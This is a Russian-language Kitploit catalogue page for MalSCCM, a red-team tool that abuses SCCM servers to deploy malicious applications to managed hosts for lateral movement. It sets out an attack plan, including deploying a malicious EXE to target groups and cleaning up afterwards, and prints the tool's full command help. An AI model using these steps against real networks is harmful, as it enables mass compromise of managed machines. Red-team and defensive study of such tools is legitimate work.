Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
MalSCCM — Используйте серверы SCCM для развертывания вредоносных приложений на управляемых хостах с целью латерального перемещения и операций красных команд. | Kitploit
Инструменты/GitHubGitHub/nettitude/malsccm
ЭксплуатацияЛатеральное перемещениеТестирование на ПроникновениеRed Teaming
GitHubnettitude/malsccm

MalSCCM

Используйте серверы SCCM для развертывания вредоносных приложений на управляемых хостах с целью латерального перемещения и операций красных команд.

Репозиторий
2563834 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

MalSCCM

Этот инструмент позволяет злоупотреблять локальными или удаленными серверами SCCM для развертывания вредоносных приложений на управляемых ими хостах. Для использования этого инструмента ваш текущий процесс должен иметь права администратора на сервере SCCM.

Обычно при развертывании SCCM сервер управления и первичный сервер находятся на одном хосте, и в этом случае хост, возвращенный командой locate, можно использовать в качестве первичного сервера.

Если это не так, вам потребуется скомпрометировать хост управления, возвращенный командой locate, чтобы затем снова запустить locate на этом хосте и получить имя первичного сервера. Как только у вас будет это имя и доступ администратора, вы готовы к работе!

Блог

Для получения дополнительной информации об использовании инструмента обратитесь к блогу ниже.

  • https://labs.nettitude.com/blog/introducing-malsccm/

Благодарности

Огромная благодарность PowerSCCM (https://github.com/PowerShellMafia/PowerSCCM), на котором все это основано; эта работа была бы невозможна без трудов @harmj0y, @jaredcatkinson, @enigma0x3, @mattifestation.

Схема атаки

  • Скомпрометируйте клиент, используйте locate для поиска сервера управления
  • Скомпрометируйте сервер управления, используйте locate для поиска первичного сервера
  • Используйте Inspect на первичном сервере, чтобы просмотреть, кого вы можете атаковать
  • Создайте новую группу устройств для машин, на которые вы хотите переместиться латерально
  • Добавьте свои цели в новую группу
  • Создайте приложение, указывающее на вредоносный EXE-файл на общедоступной сетевой папке
  • Разверните приложение в целевой группе
  • Принудительно выполните проверку обновлений целевой группы
  • Профит...
  • Очистите приложение и развертывание
  • Удалите группу
  • Меню помощи

    root@kitploit:~
    Commands listed below have optional parameters in <>. 
    
    Attempt to find the SCCM management and primary servers:
        MalSCCM.exe locate
    
    Inspect the primary server to gather SCCM information:
        MalSCCM.exe inspect </server:PrimarySiteHostname> </all /computers /deployments /groups /applications /forest /packages /primaryusers>
    
    Create/Modify/Delete Groups to add targets in for deploying malicious apps. Groups can either be for devices or users:
        MalSCCM.exe group /create /groupname:example /grouptype:[user|device] </server:PrimarySiteHostname>
        MalSCCM.exe group /delete /groupname:example </server:PrimarySiteHostname>
        MalSCCM.exe group /addhost /groupname:example /host:examplehost </server:PrimarySiteHostname>
        MalSCCM.exe group /adduser /groupname:example /user:exampleuser </server:PrimarySiteHostname>
    
    Create/Deploy/Delete malicious applications:
        MalSCCM.exe app /create /name:appname /uncpath:""\\unc\path"" </server:PrimarySiteHostname>
        MalSCCM.exe app /delete /name:appname </server:PrimarySiteHostname>
        MalSCCM.exe app /deploy /name:appname /groupname:example /assignmentname:example2 </server:PrimarySiteHostname>
        MalSCCM.exe app /deletedeploy /name:appname </server:PrimarySiteHostname>
        MalSCCM.exe app /cleanup /name:appname </server:PrimarySiteHostname>
    
    Force devices of a group to checkin within a couple minutes:
        MalSCCM.exe checkin /groupname:example </server:PrimarySiteHostname>
    
    Скачать инструмент